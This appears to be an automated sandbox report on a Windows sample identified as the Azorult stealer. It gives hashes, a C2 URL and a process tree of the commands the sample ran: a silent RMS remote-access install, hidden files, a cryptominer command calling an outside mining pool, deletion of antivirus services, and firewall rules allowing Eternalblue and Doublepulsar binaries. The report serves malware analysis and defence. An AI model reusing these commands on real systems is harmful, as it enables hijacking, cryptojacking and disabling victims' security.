Analysis
-
max time kernel
175s -
max time network
190s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
03-07-2022 04:01
General
-
Target
3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
-
Size
10.5MB
-
MD5
ad490fe7059e40a7f44b27816dddc566
-
SHA1
91c73a1800787374c0ee2420dd8c9fc096f26f1f
-
SHA256
3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c
-
SHA512
e04d1dca51032bacfc7deb7b02723d8b3cb0ad1b9cbcf49c51dc97299f96751d4998c82269ffe2e6ff0e5bf8a0b36cd477da1116274a99ef562e91022411df05
Score
10/10
Malware Config
Extracted
Family
azorult
C2
http://195.245.112.115/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
-
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
-
UAC bypass 3 TTPs 5 IoCs
-
Windows security bypass 2 TTPs 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
-
Detected Stratum cryptominer command 1 IoCs
Looks to be attempting to contact Stratum mining pool.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
XMRig Miner Payload 2 IoCs
-
ASPack v2.12-2.42 9 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocks application from running via registry modification 13 IoCs
Adds application to list of disallowed applications.
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 19 IoCs
-
Modifies Windows Firewall 1 TTPs 61 IoCs
-
Sets DLL path for service in the registry 2 TTPs 1 IoCs
-
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
UPX packed file 6 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 1 IoCs
-
Modifies file permissions 1 TTPs 64 IoCs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Modifies WinLogon 2 TTPs 7 IoCs
-
AutoIT Executable 8 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 1 IoCs
-
Drops file in Program Files directory 27 IoCs
-
Drops file in Windows directory 5 IoCs
-
Launches sc.exe 23 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 7 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Kills process with taskkill 4 IoCs
-
Modifies registry class 6 IoCs
-
NTFS ADS 1 IoCs
-
Runs .reg file with regedit 2 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 3 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 57 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 3 IoCs
-
Views/modifies file attributes 1 TTPs 5 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe"C:\Users\Admin\AppData\Local\Temp\3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Adds Run key to start application
- Checks whether UAC is enabled
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"5⤵
- UAC bypass
- Windows security bypass
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"5⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall5⤵
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10005⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"5⤵
- Launches sc.exe
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
-
C:\ProgramData\install\sys.exeC:\ProgramData\install\sys.exe2⤵
- Executes dropped EXE
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe4⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns5⤵
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns6⤵
- Gathers network information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force5⤵
-
C:\Windows\system32\gpupdate.exegpupdate /force6⤵
-
C:\ProgramData\WindowsTask\MicrosoftHost.exeC:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://fontdrvhost.ru:3333 -u CPU --donate-level=1 -k -t15⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc4⤵
-
C:\Windows\SysWOW64\sc.exesc start appidsvc5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto4⤵
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto4⤵
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv4⤵
-
C:\Windows\SysWOW64\sc.exesc delete swprv5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice4⤵
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice4⤵
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice4⤵
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice4⤵
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc4⤵
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer4⤵
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer4⤵
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle4⤵
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_644⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_645⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql4⤵
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes5⤵
- Modifies Windows Firewall
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.2554⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.2555⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.2554⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.2555⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.2555⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.2555⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.2555⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.2555⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.2554⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.2555⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.2555⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.2555⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.2484⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.2485⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.2555⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.2555⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.2555⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.2555⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.1134⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.1135⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.1134⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.1135⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.724⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.725⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.724⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.725⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.964⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.965⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.964⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.965⤵
- Modifies Windows Firewall
-
